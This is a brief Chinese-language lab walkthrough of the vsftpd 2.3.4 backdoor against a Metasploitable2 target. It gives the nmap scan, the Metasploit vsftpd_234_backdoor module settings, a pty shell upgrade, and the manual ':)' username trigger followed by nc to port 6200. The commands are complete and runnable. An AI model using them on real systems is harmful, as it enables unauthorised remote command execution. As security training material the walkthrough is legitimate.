漏洞概要
在vsftpd 2.3.4版本中,在登錄輸入用戶名時輸入:)類似於笑臉的符號,會導致服務處理開啟6200后門端口,直接執行系統命令
漏洞利用
攻擊機:kali 2022 msfconsole利用或者nc連接后門端口利用
靶機: Metasploitable2-Linux,這是一個集成了很多漏洞的平台
msfconsole利用
首先使用nmap進行目標版本服務進行掃描
靶機IP為:172.16.1.104
nmap -sV -p- -n 172.16.1.104
開啟msfconsole利用平台進行漏洞利用
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.1.104
run
漏洞利用成功,再利用成功后我們終端顯示的非常難受,可以執行python命令獲取一個虛擬終端
python -c "import pty;pty.spawn('/bin/sh')"
ftp直接連接服務,nc連接6200后門端口
使用ftp 172.16.1.104連接靶機,用戶名輸入任意用戶名加:),例如root:)
密碼隨便輸入
打開一個終端使用nc進行連接
nc 172.16.1.104 6200
漏洞利用成功